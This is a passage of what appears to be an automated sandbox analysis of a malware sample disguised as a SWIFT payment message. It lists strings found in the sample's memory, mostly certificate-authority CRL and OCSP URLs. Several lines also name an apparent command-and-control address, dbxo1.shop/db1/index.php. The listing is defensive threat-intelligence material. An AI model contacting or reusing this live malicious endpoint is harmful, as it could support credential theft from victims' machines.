Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033506219.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060628041.000000000185A000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030675103.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033003378.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7911321206.0000000001875000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8031540665.000000000186C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033506219.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060628041.000000000185A000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030675103.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033003378.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7911321206.0000000001875000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8031540665.000000000186C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr, nssdbm3.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr, nssdbm3.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033506219.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030675103.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033003378.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8031540665.000000000186C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dbxo1.shop/
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8031540665.000000000186C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dbxo1.shop/db1/index.php
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033506219.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030675103.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033003378.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8031540665.000000000186C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dbxo1.shop/db1/index.phpC
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033506219.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030675103.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033003378.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8031540665.000000000186C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dbxo1.shop/db1/index.phpft
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8078319161.000000001D460000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://dbxo1.shop/db1/index.phpl
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033506219.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030675103.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033003378.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8031540665.000000000186C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dbxo1.shop/db1/index.phpp
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033506219.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030675103.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033003378.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8031540665.000000000186C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dbxo1.shop/nr
Source: Swift Mesaj#U0131#09971.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr, nssdbm3.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 